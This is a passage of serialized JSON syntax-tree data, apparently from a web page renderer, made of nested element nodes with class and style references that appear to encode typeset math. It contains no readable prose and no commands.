:137,"props":145227,"children":145229},{"className":145228},[236],[145230],{"type":26,"tag":137,"props":145231,"children":145233},{"className":145232},[241,417],[145234,145263],{"type":26,"tag":137,"props":145235,"children":145237},{"className":145236},[246],[145238,145258],{"type":26,"tag":137,"props":145239,"children":145241},{"className":145240,"style":815},[251],[145242],{"type":26,"tag":137,"props":145243,"children":145244},{"style":819},[145245,145249],{"type":26,"tag":137,"props":145246,"children":145248},{"className":145247,"style":262},[261],[],{"type":26,"tag":137,"props":145250,"children":145252},{"className":145251},[267,268,269,270],[145253],{"type":26,"tag":137,"props":145254,"children":145256},{"className":145255},[169,170,270],[145257],{"type":32,"value":942},{"type":26,"tag":137,"props":145259,"children":145261},{"className":145260},[453],[145262],{"type":32,"value":456},{"type":26,"tag":137,"props":145264,"children":145266},{"className":145265},[246],[145267],{"type":26,"tag":137,"props":145268,"children":145270},{"className":145269,"style":464},[251],[145271],{"type":26,"tag":137,"props":145272,"children":145273},{},[],{"type":26,"tag":137,"props":145275,"children":145277},{"className":145276,"style":281},[184],[],{"type":26,"tag":137,"props":145279,"children":145281},{"className":145280},[286],[145282],{"type":32,"value":289},{"type":26,"tag":137,"props":145284,"children":145286},{"className":145285,"style":281},[184],[],{"type":26,"tag":137,"props":145288,"children":145290},{"className":145289},[151],[145291,145295],{"type":26,"tag":137,"props":145292,"children":145294},{"className":145293,"style":368},[156],[],{"type":26,"tag":137,"props":145296,"children":145298},{"className":145297},[169],[145299],{"type":32,"value":878},{"type":32,"value":986},{"type":26,"tag":762,"props":145302,"children":145303},{},[145304],{"type":32,"value":991},{"type":32,"value":993},{"type":26,"tag":118,"props":145307,"children":145308},{"id":996},[145309],{"type":32,"value":999},{"type":26,"tag":35,"props":145311,"children":145312},{},[145313,145314,145318,145319,145411,145412,145504,145505,145597,145598,145602,145603,145695,145696,145788,145789,145814,145815,145840,145841,145933,145934,145959,145960,145985],{"type":32,"value":1004},{"type":26,"tag":762,"props":145315,"children":145316},{},[145317],{"type":32,"value":1009},{"type":32,"value":1011},{"type":26,"tag":130,"props":145320,"children":145322},{"className":145321},[133,134],[145323],{"type":26,"tag":137,"props":145324,"children":145326},{"className":145325},[140],[145327],{"type":26,"tag":137,"props":145328,"children":145330},{"className":145329,"ariaHidden":146},[145],[145331],{"type":26,"tag":137,"props":145332,"children":145334},{"className":145333},[151],[145335,145339,145396,145401,145406],{"type":26,"tag":137,"props":145336,"children":145338},{"className":145337,"style":157},[156],[],{"type":26,"tag":137,"props":145340,"children":145342},{"className":145341},[169],[145343,145348],{"type":26,"tag":137,"props":145344,"children":145346},{"className":145345,"style":1039},[169,170],[145347],{"type":32,"value":1042},{"type":26,"tag":137,"props":145349,"children":145351},{"className":145350},[236],[145352],{"type":26,"tag":137,"props":145353,"children":145355},{"className":145354},[241,417],[145356,145385],{"type":26,"tag":137,"props":145357,"children":145359},{"className":145358},[246],[145360,145380],{"type":26,"tag":137,"props":145361,"children":145363},{"className":145362,"style":815},[251],[145364],{"type":26,"tag":137,"props":145365,"children":145366},{"style":1061},[145367,145371],{"type":26,"tag":137,"props":145368,"children":145370},{"className":145369,"style":262},[261],[],{"type":26,"tag":137,"props":145372,"children":145374},{"className":145373},[267,268,269,270],[145375],{"type":26,"tag":137,"props":145376,"children":145378},{"className":145377},[169,170,270],[145379],{"type":32,"value":942},{"type":26,"tag":137,"props":145381,"children":145383},{"className":145382},[453],[145384],{"type":32,"value":456},{"type":26,"tag":137,"props":145386,"children":145388},{"className":145387},[246],[145389],{"type":26,"tag":137,"props":145390,"children":145392},{"className":145391,"style":464},[251],[145393],{"type":26,"tag":137,"props":145394,"children":145395},{},[],{"type":26,"tag":137,"props":145397,"children":145399},{"className":145398},[162],[145400],{"type":32,"value":165},{"type":26,"tag":137,"props":145402,"children":145404},{"className":145403},[169,170],[145405],{"type":32,"value":173},{"type":26,"tag":137,"props":145407,"children":145409},{"className":145408},[197],[145410],{"type":32,"value":200},{"type":32,"value":1108},{"type":26,"tag":130,"props":145413,"children":145415},{"className":145414},[133,134],[145416],{"type":26,"tag":137,"props":145417,"children":145419},{"className":145418},[140],[145420],{"type":26,"tag":137,"props":145421,"children":145423},{"className":145422,"ariaHidden":146},[145],[145424],{"type":26,"tag":137,"props":145425,"children":145427},{"className":145426},[151],[145428,145432,145489,145494,145499],{"type":26,"tag":137,"props":145429,"children":145431},{"className":145430,"style":157},[156],[],{"type":26,"tag":137,"props":145433,"children":145435},{"className":145434},[169],[145436,145441],{"type":26,"tag":137,"props":145437,"children":145439},{"className":145438,"style":1039},[169,170],[145440],{"type":32,"value":1042},{"type":26,"tag":137,"props":145442,"children":145444},{"className":145443},[236],[145445],{"type":26,"tag":137,"props":145446,"children":145448},{"className":145447},[241,417],[145449,145478],{"type":26,"tag":137,"props":145450,"children":145452},{"className":145451},[246],[145453,145473],{"type":26,"tag":137,"props":145454,"children":145456},{"className":145455,"style":815},[251],[145457],{"type":26,"tag":137,"props":145458,"children":145459},{"style":1061},[145460,145464],{"type":26,"tag":137,"props":145461,"children":145463},{"className":145462,"style":262},[261],[],{"type":26,"tag":137,"props":145465,"children":145467},{"className":145466},[267,268,269,270],[145468],{"type":26,"tag":137,"props":145469,"children":145471},{"className":145470,"style":1168},[169,170,270],[145472],{"type":32,"value":1171},{"type":26,"tag":137,"props":145474,"children":145476},{"className":145475},[453],[145477],{"type":32,"value":456},{"type":26,"tag":137,"props":145479,"children":145481},{"className":145480},[246],[145482],{"type":26,"tag":137,"props":145483,"children":145485},{"className":145484,"style":464},[251],[145486],{"type":26,"tag":137,"props":145487,"children":145488},{},[],{"type":26,"tag":137,"props":145490,"children":145492},{"className":145491},[162],[145493],{"type":32,"value":165},{"type":26,"tag":137,"props":145495,"children":145497},{"className":145496},[169,170],[145498],{"type":32,"value":173},{"type":26,"tag":137,"props":145500,"children":145502},{"className":145501},[197],[145503],{"type":32,"value":200},{"type":32,"value":1108},{"type":26,"tag":130,"props":145506,"children":145508},{"className":145507},[133,134],[145509],{"type":26,"tag":137,"props":145510,"children":145512},{"className":145511},[140],[145513],{"type":26,"tag":137,"props":145514,"children":145516},{"className":145515,"ariaHidden":146},[145],[145517],{"type":26,"tag":137,"props":145518,"children":145520},{"className":145519},[151],[145521,145525,145582,145587,145592],{"type":26,"tag":137,"props":145522,"children":145524},{"className":145523,"style":157},[156],[],{"type":26,"tag":137,"props":145526,"children":145528},{"className":145527},[169],[145529,145534],{"type":26,"tag":137,"props":145530,"children":145532},{"className":145531,"style":1039},[169,170],[145533],{"type":32,"value":1042},{"type":26,"tag":137,"props":145535,"children":145537},{"className":145536},[236],[145538],{"type":26,"tag":137,"props":145539,"children":145541},{"className":145540},[241,417],[145542,145571],{"type":26,"tag":137,"props":145543,"children":145545},{"className":145544},[246],[145546,145566],{"type":26,"tag":137,"props":145547,"children":145549},{"className":145548,"style":815},[251],[145550],{"type":26,"tag":137,"props":145551,"children":145552},{"style":1061},[145553,145557],{"type":26,"tag":137,"props":145554,"children":145556},{"className":145555,"style":262},[261],[],{"type":26,"tag":137,"props":145558,"children":145560},{"className":145559},[267,268,269,270],[145561],{"type":26,"tag":137,"props":145562,"children":145564},{"className":145563,"style":621},[169,170,270],[145565],{"type":32,"value":1265},{"type":26,"tag":137,"props":145567,"children":145569},{"className":145568},[453],[145570],{"type":32,"value":456},{"type":26,"tag":137,"props":145572,"children":145574},{"className":145573},[246],[145575],{"type":26,"tag":137,"props":145576,"children":145578},{"className":145577,"style":464},[251],[145579],{"type":26,"tag":137,"props":145580,"children":145581},{},[],{"type":26,"tag":137,"props":145583,"children":145585},{"className":145584},[162],[145586],{"type":32,"value":165},{"type":26,"tag":137,"props":145588,"children":145590},{"className":145589},[169,170],[145591],{"type":32,"value":173},{"type":26,"tag":137,"props":145593,"children":145595},{"className":145594},[197],[145596],{"type":32,"value":200},{"type":32,"value":1298},{"type":26,"tag":762,"props":145599,"children":145600},{},[145601],{"type":32,"value":1303},{"type":32,"value":1011},{"type":26,"tag":130,"props":145604,"children":145606},{"className":145605},[133,134],[145607],{"type":26,"tag":137,"props":145608,"children":145610},{"className":145609},[140],[145611],{"type":26,"tag":137,"props":145612,"children":145614},{"className":145613,"ariaHidden":146},[145],[145615],{"type":26,"tag":137,"props":145616,"children":145618},{"className":145617},[151],[145619,145623,145680,145685,145690],{"type":26,"tag":137,"props":145620,"children":145622},{"className":145621,"style":157},[156],[],{"type":26,"tag":137,"props":145624,"children":145626},{"className":145625},[169],[145627,145632],{"type":26,"tag":137,"props":145628,"children":145630},{"className":145629},[169,170],[145631],{"type":32,"value":1334},{"type":26,"tag":137,"props":145633,"children":145635},{"className":145634},[236],[145636],{"type":26,"tag":137,"props":145637,"children":145639},{"className":145638},[241,417],[145640,145669],{"type":26,"tag":137,"props":145641,"children":145643},{"className":145642},[246],[145644,145664],{"type":26,"tag":137,"props":145645,"children":145647},{"className":145646,"style":815},[251],[145648],{"type":26,"tag":137,"props":145649,"children":145650},{"style":430},[145651,145655],{"type":26,"tag":137,"props":145652,"children":145654},{"className":145653,"style":262},[261],[],{"type":26,"tag":137,"props":145656,"children":145658},{"className":145657},[267,268,269,270],[145659],{"type":26,"tag":137,"props":145660,"children":145662},{"className":145661,"style":832},[169,170,270],[145663],{"type":32,"value":835},{"type":26,"tag":137,"props":145665,"children":145667},{"className":145666},[453],[145668],{"type":32,"value":456},{"type":26,"tag":137,"props":145670,"children":145672},{"className":145671},[246],[145673],{"type":26,"tag":137,"props":145674,"children":145676},{"className":145675,"style":464},[251],[145677],{"type":26,"tag":137,"props":145678,"children":145679},{},[],{"type":26,"tag":137,"props":145681,"children":145683},{"className":145682},[162],[145684],{"type":32,"value":165},{"type":26,"tag":137,"props":145686,"children":145688},{"className":145687},[169,170],[145689],{"type":32,"value":173},{"type":26,"tag":137,"props":145691,"children":145693},{"className":145692},[197],[145694],{"type":32,"value":200},{"type":32,"value":1108},{"type":26,"tag":130,"props":145697,"children":145699},{"className":145698},[133,134],[145700],{"type":26,"tag":137,"props":145701,"children":145703},{"className":145702},[140],[145704],{"type":26,"tag":137,"props":145705,"children":145707},{"className":145706,"ariaHidden":146},[145],[145708],{"type":26,"tag":137,"props":145709,"children":145711},{"className":145710},[151],[145712,145716,145773,145778,145783],{"type":26,"tag":137,"props":145713,"children":145715},{"className":145714,"style":157},[156],[],{"type":26,"tag":137,"props":145717,"children":145719},{"className":145718},[169],[145720,145725],{"type":26,"tag":137,"props":145721,"children":145723},{"className":145722},[169,170],[145724],{"type":32,"value":1334},{"type":26,"tag":137,"props":145726,"children":145728},{"className":145727},[236],[145729],{"type":26,"tag":137,"props":145730,"children":145732},{"className":145731},[241,417],[145733,145762],{"type":26,"tag":137,"props":145734,"children":145736},{"className":145735},[246],[145737,145757],{"type":26,"tag":137,"props":145738,"children":145740},{"className":145739,"style":815},[251],[145741],{"type":26,"tag":137,"props":145742,"children":145743},{"style":430},[145744,145748],{"type":26,"tag":137,"props":145745,"children":145747},{"className":145746,"style":262},[261],[],{"type":26,"tag":137,"props":145749,"children":145751},{"className":145750},[267,268,269,270],[145752],{"type":26,"tag":137,"props":145753,"children":145755},{"className":145754},[169,170,270],[145756],{"type":32,"value":942},{"type":26,"tag":137,"props":145758,"children":145760},{"className":145759},[453],[145761],{"type":32,"value":456},{"type":26,"tag":137,"props":145763,"children":145765},{"className":145764},[246],[145766],{"type":26,"tag":137,"props":145767,"children":145769},{"className":145768,"style":464},[251],[145770],{"type":26,"tag":137,"props":145771,"children":145772},{},[],{"type":26,"tag":137,"props":145774,"children":145776},{"className":145775},[162],[145777],{"type":32,"value":165},{"type":26,"tag":137,"props":145779,"children":145781},{"className":145780},[169,170],[145782],{"type":32,"value":173},{"type":26,"tag":137,"props":145784,"children":145786},{"className":145785},[197],[145787],{"type":32,"value":200},{"type":32,"value":1492},{"type":26,"tag":130,"props":145790,"children":145792},{"className":145791},[133,134],[145793],{"type":26,"tag":137,"props":145794,"children":145796},{"className":145795},[140],[145797],{"type":26,"tag":137,"props":145798,"children":145800},{"className":145799,"ariaHidden":146},[145],[145801],{"type":26,"tag":137,"props":145802,"children":145804},{"className":145803},[151],[145805,145809],{"type":26,"tag":137,"props":145806,"children":145808},{"className":145807,"style":1512},[156],[],{"type":26,"tag":137,"props":145810,"children":145812},{"className":145811,"style":1517},[169,170],[145813],{"type":32,"value":1520},{"type":32,"value":1522},{"type":26,"tag":130,"props":145816,"children":145818},{"className":145817},[133,134],[145819],{"type":26,"tag":137,"props":145820,"children":145822},{"className":145821},[140],[145823],{"type":26,"tag":137,"props":145824,"children":145826},{"className":145825,"ariaHidden":146},[145],[145827],{"type":26,"tag":137,"props":145828,"children":145830},{"className":145829},[151],[145831,145835],{"type":26,"tag":137,"props":145832,"children":145834},{"className":145833,"style":1542},[156],[],{"type":26,"tag":137,"props":145836,"children":145838},{"className":145837},[169,170],[145839],{"type":32,"value":1549},{"type":32,"value":1551},{"type":26,"tag":130,"props":145842,"children":145844},{"className":145843},[133,134],[145845],{"type":26,"tag":137,"props":145846,"children":145848},{"className":145847},[140],[145849],{"type":26,"tag":137,"props":145850,"children":145852},{"className":145851,"ariaHidden":146},[145],[145853],{"type":26,"tag":137,"props":145854,"children":145856},{"className":145855},[151],[145857,145861,145918,145923,145928],{"type":26,"tag":137,"props":145858,"children":145860},{"className":145859,"style":157},[156],[],{"type":26,"tag":137,"props":145862,"children":145864},{"className":145863},[169],[145865,145870],{"type":26,"tag":137,"props":145866,"children":145868},{"className":145867,"style":1039},[169,170],[145869],{"type":32,"value":1042},{"type":26,"tag":137,"props":145871,"children":145873},{"className":145872},[236],[145874],{"type":26,"tag":137,"props":145875,"children":145877},{"className":145876},[241,417],[145878,145907],{"type":26,"tag":137,"props":145879,"children":145881},{"className":145880},[246],[145882,145902],{"type":26,"tag":137,"props":145883,"children":145885},{"className":145884,"style":815},[251],[145886],{"type":26,"tag":137,"props":145887,"children":145888},{"style":1061},[145889,145893],{"type":26,"tag":137,"props":145890,"children":145892},{"className":145891,"style":262},[261],[],{"type":26,"tag":137,"props":145894,"children":145896},{"className":145895},[267,268,269,270],[145897],{"type":26,"tag":137,"props":145898,"children":145900},{"className":145899},[169,170,270],[145901],{"type":32,"value":942},{"type":26,"tag":137,"props":145903,"children":145905},{"className":145904},[453],[145906],{"type":32,"value":456},{"type":26,"tag":137,"props":145908,"children":145910},{"className":145909},[246],[145911],{"type":26,"tag":137,"props":145912,"children":145914},{"className":145913,"style":464},[251],[145915],{"type":26,"tag":137,"props":145916,"children":145917},{},[],{"type":26,"tag":137,"props":145919,"children":145921},{"className":145920},[162],[145922],{"type":32,"value":165},{"type":26,"tag":137,"props":145924,"children":145926},{"className":145925},[169,170],[145927],{"type":32,"value":173},{"type":26,"tag":137,"props":145929,"children":145931},{"className":145930},[197],[145932],{"type":32,"value":200},{"type":32,"value":1645},{"type":26,"tag":130,"props":145935,"children":145937},{"className":145936},[133,134],[145938],{"type":26,"tag":137,"props":145939,"children":145941},{"className":145940},[140],[145942],{"type":26,"tag":137,"props":145943,"children":145945},{"className":145944,"ariaHidden":146},[145],[145946],{"type":26,"tag":137,"props":145947,"children":145949},{"className":145948},[151],[145950,145954],{"type":26,"tag":137,"props":145951,"children":145953},{"className":145952,"style":499},[156],[],{"type":26,"tag":137,"props":145955,"children":145957},{"className":145956},[169,170],[145958],{"type":32,"value":506},{"type":32,"value":1672},{"type":26,"tag":130,"props":145961,"children":145963},{"className":145962},[133,134],[145964],{"type":26,"tag":137,"props":145965,"children":145967},{"className":145966},[140],[145968],{"type":26,"tag":137,"props":145969,"children":145971},{"className":145970,"ariaHidden":146},[145],[145972],{"type":26,"tag":137,"props":145973,"children":145975},{"className":145974},[151],[145976,145980],{"type":26,"tag":137,"props":145977,"children":145979},{"className":145978,"style":499},[156],[],{"type":26,"tag":137,"props":145981,"children":145983},{"className":145982},[169,170],[145984],{"type":32,"value":506},{"type":32,"value":470},{"type":26,"tag":1700,"props":145987,"children":145988},{},[],{"type":26,"tag":35,"props":145990,"children":145991},{},[145992,145993,146033,146034,146100,146101,146229,146230,146270,146271,146311,146312,146352,146353,146475],{"type":32,"value":1707},{"type":26,"tag":130,"props":145994,"children":145996},{"className":145995},[133,134],[145997],{"type":26,"tag":137,"props":145998,"children":146000},{"className":145999},[140],[146001],{"type":26,"tag":137,"props":146002,"children":146004},{"className":146003,"ariaHidden":146},[145],[146005],{"type":26,"tag":137,"props":146006,"children":146008},{"className":146007},[151],[146009,146013,146018,146023,146028],{"type":26,"tag":137,"props":146010,"children":146012},{"className":146011,"style":157},[156],[],{"type":26,"tag":137,"props":146014,"children":146016},{"className":146015,"style":1731},[169,170],[146017],{"type":32,"value":409},{"type":26,"tag":137,"props":146019,"children":146021},{"className":146020},[162],[146022],{"type":32,"value":165},{"type":26,"tag":137,"props":146024,"children":146026},{"className":146025},[169,170],[146027],{"type":32,"value":173},{"type":26,"tag":137,"props":146029,"children":146031},{"className":146030},[197],[146032],{"type":32,"value":200},{"type":32,"value":1750},{"type":26,"tag":130,"props":146035,"children":146037},{"className":146036},[133,134],[146038],{"type":26,"tag":137,"props":146039,"children":146041},{"className":146040},[140],[146042],{"type":26,"tag":137,"props":146043,"children":146045},{"className":146044,"ariaHidden":146},[145],[146046,146087],{"type":26,"tag":137,"props":146047,"children":146049},{"className":146048},[151],[146050,146054,146059,146064,146069,146074,146078,146083],{"type":26,"tag":137,"props":146051,"children":146053},{"className":146052,"style":157},[156],[],{"type":26,"tag":137,"props":146055,"children":146057},{"className":146056,"style":1731},[169,170],[146058],{"type":32,"value":409},{"type":26,"tag":137,"props":146060,"children":146062},{"className":146061},[162],[146063],{"type":32,"value":165},{"type":26,"tag":137,"props":146065,"children":146067},{"className":146066},[169,170],[146068],{"type":32,"value":173},{"type":26,"tag":137,"props":146070,"children":146072},{"className":146071},[197],[146073],{"type":32,"value":200},{"type":26,"tag":137,"props":146075,"children":146077},{"className":146076,"style":281},[184],[],{"type":26,"tag":137,"props":146079,"children":146081},{"className":146080},[286],[146082],{"type":32,"value":289},{"type":26,"tag":137,"props":146084,"children":146086},{"className":146085,"style":281},[184],[],{"type":26,"tag":137,"props":146088,"children":146090},{"className":146089},[151],[146091,146095],{"type":26,"tag":137,"props":146092,"children":146094},{"className":146093,"style":368},[156],[],{"type":26,"tag":137,"props":146096,"children":146098},{"className":146097},[169],[146099],{"type":32,"value":1817},{"type":32,"value":1819},{"type":26,"tag":130,"props":146102,"children":146104},{"className":146103},[133,134],[146105],{"type":26,"tag":137,"props":146106,"children":146108},{"className":146107},[140],[146109],{"type":26,"tag":137,"props":146110,"children":146112},{"className":146111,"ariaHidden":146},[145],[146113,146154,146216],{"type":26,"tag":137,"props":146114,"children":146116},{"className":146115},[151],[146117,146121,146126,146131,146136,146141,146145,146150],{"type":26,"tag":137,"props":146118,"children":146120},{"className":146119,"style":157},[156],[],{"type":26,"tag":137,"props":146122,"children":146124},{"className":146123,"style":1843},[169,170],[146125],{"type":32,"value":1846},{"type":26,"tag":137,"props":146127,"children":146129},{"className":146128},[162],[146130],{"type":32,"value":165},{"type":26,"tag":137,"props":146132,"children":146134},{"className":146133},[169,170],[146135],{"type":32,"value":173},{"type":26,"tag":137,"props":146137,"children":146139},{"className":146138},[197],[146140],{"type":32,"value":200},{"type":26,"tag":137,"props":146142,"children":146144},{"className":146143,"style":281},[184],[],{"type":26,"tag":137,"props":146146,"children":146148},{"className":146147},[286],[146149],{"type":32,"value":289},{"type":26,"tag":137,"props":146151,"children":146153},{"className":146152,"style":281},[184],[],{"type":26,"tag":137,"props":146155,"children":146157},{"className":146156},[151],[146158,146162,146203,146207,146212],{"type":26,"tag":137,"props":146159,"children":146161},{"className":146160,"style":1882},[156],[],{"type":26,"tag":137,"props":146163,"children":146165},{"className":146164},[169],[146166,146171],{"type":26,"tag":137,"props":146167,"children":146169},{"className":146168},[169,170],[146170],{"type":32,"value":173},{"type":26,"tag":137,"props":146172,"children":146174},{"className":146173},[236],[146175],{"type":26,"tag":137,"props":146176,"children":146178},{"className":146177},[241],[146179],{"type":26,"tag":137,"props":146180,"children":146182},{"className":146181},[246],[146183],{"type":26,"tag":137,"props":146184,"children":146186},{"className":146185,"style":1908},[251],[146187],{"type":26,"tag":137,"props":146188,"children":146189},{"style":256},[146190,146194],{"type":26,"tag":137,"props":146191,"children":146193},{"className":146192,"style":262},[261],[],{"type":26,"tag":137,"props":146195,"children":146197},{"className":146196},[267,268,269,270],[146198],{"type":26,"tag":137,"props":146199,"children":146201},{"className":146200},[169,170,270],[146202],{"type":32,"value":1549},{"type":26,"tag":137,"props":146204,"children":146206},{"className":146205,"style":348},[184],[],{"type":26,"tag":137,"props":146208,"children":146210},{"className":146209},[353],[146211],{"type":32,"value":1935},{"type":26,"tag":137,"props":146213,"children":146215},{"className":146214,"style":348},[184],[],{"type":26,"tag":137,"props":146217,"children":146219},{"className":146218},[151],[146220,146224],{"type":26,"tag":137,"props":146221,"children":146223},{"className":146222,"style":368},[156],[],{"type":26,"tag":137,"props":146225,"children":146227},{"className":146226},[169],[146228],{"type":32,"value":878},{"type":32,"value":1954},{"type":26,"tag":130,"props":146231,"children":146233},{"className":146232},[133,134],[146234],{"type":26,"tag":137,"props":146235,"children":146237},{"className":146236},[140],[146238],{"type":26,"tag":137,"props":146239,"children":146241},{"className":146240,"ariaHidden":146},[145],[146242],{"type":26,"tag":137,"props":146243,"children":146245},{"className":146244},[151],[146246,146250,146255,146260,146265],{"type":26,"tag":137,"props":146247,"children":146249},{"className":146248,"style":157},[156],[],{"type":26,"tag":137,"props":146251,"children":146253},{"className":146252,"style":1843},[169,170],[146254],{"type":32,"value":1846},{"type":26,"tag":137,"props":146256,"children":146258},{"className":146257},[162],[146259],{"type":32,"value":165},{"type":26,"tag":137,"props":146261,"children":146263},{"className":146262},[169,170],[146264],{"type":32,"value":173},{"type":26,"tag":137,"props":146266,"children":146268},{"className":146267},[197],[146269],{"type":32,"value":200},{"type":32,"value":1996},{"type":26,"tag":130,"props":146272,"children":146274},{"className":146273},[133,134],[146275],{"type":26,"tag":137,"props":146276,"children":146278},{"className":146277},[140],[146279],{"type":26,"tag":137,"props":146280,"children":146282},{"className":146281,"ariaHidden":146},[145],[146283],{"type":26,"tag":137,"props":146284,"children":146286},{"className":146285},[151],[146287,146291,146296,146301,146306],{"type":26,"tag":137,"props":146288,"children":146290},{"className":146289,"style":157},[156],[],{"type":26,"tag":137,"props":146292,"children":146294},{"className":146293,"style":1731},[169,170],[146295],{"type":32,"value":409},{"type":26,"tag":137,"props":146297,"children":146299},{"className":146298},[162],[146300],{"type":32,"value":165},{"type":26,"tag":137,"props":146302,"children":146304},{"className":146303},[169,170],[146305],{"type":32,"value":173},{"type":26,"tag":137,"props":146307,"children":146309},{"className":146308},[197],[146310],{"type":32,"value":200},{"type":32,"value":2038},{"type":26,"tag":130,"props":146313,"children":146315},{"className":146314},[133,134],[146316],{"type":26,"tag":137,"props":146317,"children":146319},{"className":146318},[140],[146320],{"type":26,"tag":137,"props":146321,"children":146323},{"className":146322,"ariaHidden":146},[145],[146324],{"type":26,"tag":137,"props":146325,"children":146327},{"className":146326},[151],[146328,146332,146337,146342,146347],{"type":26,"tag":137,"props":146329,"children":146331},{"className":146330,"style":157},[156],[],{"type":26,"tag":137,"props":146333,"children":146335},{"className":146334,"style":1731},[169,170],[146336],{"type":32,"value":2064},{"type":26,"tag":137,"props":146338,"children":146340},{"className":146339},[162],[146341],{"type":32,"value":165},{"type":26,"tag":137,"props":146343,"children":146345},{"className":146344},[169,170],[146346],{"type":32,"value":173},{"type":26,"tag":137,"props":146348,"children":146350},{"className":146349},[197],[146351],{"type":32,"value":200},{"type":32,"value":2081},{"type":26,"tag":130,"props":146354,"children":146356},{"className":146355},[133,134],[146357],{"type":26,"tag":137,"props":146358,"children":146360},{"className":146359},[140],[146361],{"type":26,"tag":137,"props":146362,"children":146364},{"className":146363,"ariaHidden":146},[145],[146365,146406,146447],{"type":26,"tag":137,"props":146366,"children":146368},{"className":146367},[151],[146369,146373,146378,146383,146388,146393,146397,146402],{"type":26,"tag":137,"props":146370,"children":146372},{"className":146371,"style":157},[156],[],{"type":26,"tag":137,"props":146374,"children":146376},{"className":146375,"style":1731},[169,170],[146377],{"type":32,"value":409},{"type":26,"tag":137,"props":146379,"children":146381},{"className":146380},[162],[146382],{"type":32,"value":165},{"type":26,"tag":137,"props":146384,"children":146386},{"className":146385},[169,170],[146387],{"type":32,"value":173},{"type":26,"tag":137,"props":146389,"children":146391},{"className":146390},[197],[146392],{"type":32,"value":200},{"type":26,"tag":137,"props":146394,"children":146396},{"className":146395,"style":281},[184],[],{"type":26,"tag":137,"props":146398,"children":146400},{"className":146399},[286],[146401],{"type":32,"value":289},{"type":26,"tag":137,"props":146403,"children":146405},{"className":146404,"style":281},[184],[],{"type":26,"tag":137,"props":146407,"children":146409},{"className":146408},[151],[146410,146414,146419,146424,146429,146434,146438,146443],{"type":26,"tag":137,"props":146411,"children":146413},{"className":146412,"style":157},[156],[],{"type":26,"tag":137,"props":146415,"children":146417},{"className":146416,"style":1731},[169,170],[146418],{"type":32,"value":2064},{"type":26,"tag":137,"props":146420,"children":146422},{"className":146421},[162],[146423],{"type":32,"value":165},{"type":26,"tag":137,"props":146425,"children":146427},{"className":146426},[169,170],[146428],{"type":32,"value":173},{"type":26,"tag":137,"props":146430,"children":146432},{"className":146431},[197],[146433],{"type":32,"value":200},{"type":26,"tag":137,"props":146435,"children":146437},{"className":146436,"style":348},[184],[],{"type":26,"tag":137,"props":146439,"children":146441},{"className":146440},[353],[146442],{"type":32,"value":2172},{"type":26,"tag":137,"props":146444,"children":146446},{"className":146445,"style":348},[184],[],{"type":26,"tag":137,"props":146448,"children":146450},{"className":146449},[151],[146451,146455,146460,146465,146470],{"type":26,"tag":137,"props":146452,"children":146454},{"className":146453,"style":157},[156],[],{"type":26,"tag":137,"props":146456,"children":146458},{"className":146457,"style":1843},[169,170],[146459],{"type":32,"value":1846},{"type":26,"tag":137,"props":146461,"children":146463},{"className":146462},[162],[146464],{"type":32,"value":165},{"type":26,"tag":137,"props":146466,"children":146468},{"className":146467},[169,170],[146469],{"type":32,"value":173},{"type":26,"tag":137,"props":146471,"children":146473},{"className":146472},[197],[146474],{"type":32,"value":200},{"type":32,"value":470},{"type":26,"tag":35,"props":146477,"children":146478},{},[146479],{"type":26,"tag":2210,"props":146480,"children":146481},{"alt":2212,"src":2213},[],{"type":26,"tag":118,"props":146483,"children":146484},{"id":2217},[146485],{"type":32,"value":2220},{"type":26,"tag":35,"props":146487,"children":146488},{},[146489,146490,146494,146495,146499],{"type":32,"value":2225},{"type":26,"tag":762,"props":146491,"children":146492},{},[146493],{"type":32,"value":2230},{"type":32,"value":2232},{"type":26,"tag":762,"props":146496,"children":146497},{},[146498],{"type":32,"value":2237},{"type":32,"value":2239},{"type":26,"tag":35,"props":146501,"children":146502},{},[146503],{"type":32,"value":2244},{"type":26,"tag":118,"props":146505,"children":146506},{"id":2247},[146507],{"type":32,"value":2250},{"type":26,"tag":35,"props":146509,"children":146510},{},[146511,146512,146552,146553,146578,146579,146701,146702,146727],{"type":32,"value":2255},{"type":26,"tag":130,"props":146513,"children":146515},{"className":146514},[133,134],[146516],{"type":26,"tag":137,"props":146517,"children":146519},{"className":146518},[140],[146520],{"type":26,"tag":137,"props":146521,"children":146523},{"className":146522,"ariaHidden":146},[145],[146524],{"type":26,"tag":137,"props":146525,"children":146527},{"className":146526},[151],[146528,146532,146537,146542,146547],{"type":26,"tag":137,"props":146529,"children":146531},{"className":146530,"style":157},[156],[],{"type":26,"tag":137,"props":146533,"children":146535},{"className":146534,"style":1731},[169,170],[146536],{"type":32,"value":2064},{"type":26,"tag":137,"props":146538,"children":146540},{"className":146539},[162],[146541],{"type":32,"value":165},{"type":26,"tag":137,"props":146543,"children":146545},{"className":146544},[169,170],[146546],{"type":32,"value":173},{"type":26,"tag":137,"props":146548,"children":146550},{"className":146549},[197],[146551],{"type":32,"value":200},{"type":32,"value":2297},{"type":26,"tag":130,"props":146554,"children":146556},{"className":146555},[133,134],[146557],{"type":26,"tag":137,"props":146558,"children":146560},{"className":146559},[140],[146561],{"type":26,"tag":137,"props":146562,"children":146564},{"className":146563,"ariaHidden":146},[145],[146565],{"type":26,"tag":137,"props":146566,"children":146568},{"className":146567},[151],[146569,146573],{"type":26,"tag":137,"props":146570,"children":146572},{"className":146571,"style":1542},[156],[],{"type":26,"tag":137,"props":146574,"children":146576},{"className":146575,"style":2321},[169,170],[146577],{"type":32,"value":2324},{"type":32,"value":2326},{"type":26,"tag":130,"props":146580,"children":146582},{"className":146581},[133,134],[146583],{"type":26,"tag":137,"props":146584,"children":146586},{"className":146585},[140],[146587],{"type":26,"tag":137,"props":146588,"children":146590},{"className":146589,"ariaHidden":146},[145],[146591,146632,146673],{"type":26,"tag":137,"props":146592,"children":146594},{"className":146593},[151],[146595,146599,146604,146609,146614,146619,146623,146628],{"type":26,"tag":137,"props":146596,"children":146598},{"className":146597,"style":157},[156],[],{"type":26,"tag":137,"props":146600,"children":146602},{"className":146601,"style":1731},[169,170],[146603],{"type":32,"value":409},{"type":26,"tag":137,"props":146605,"children":146607},{"className":146606},[162],[146608],{"type":32,"value":165},{"type":26,"tag":137,"props":146610,"children":146612},{"className":146611,"style":2321},[169,170],[146613],{"type":32,"value":2324},{"type":26,"tag":137,"props":146615,"children":146617},{"className":146616},[197],[146618],{"type":32,"value":200},{"type":26,"tag":137,"props":146620,"children":146622},{"className":146621,"style":281},[184],[],{"type":26,"tag":137,"props":146624,"children":146626},{"className":146625},[286],[146627],{"type":32,"value":289},{"type":26,"tag":137,"props":146629,"children":146631},{"className":146630,"style":281}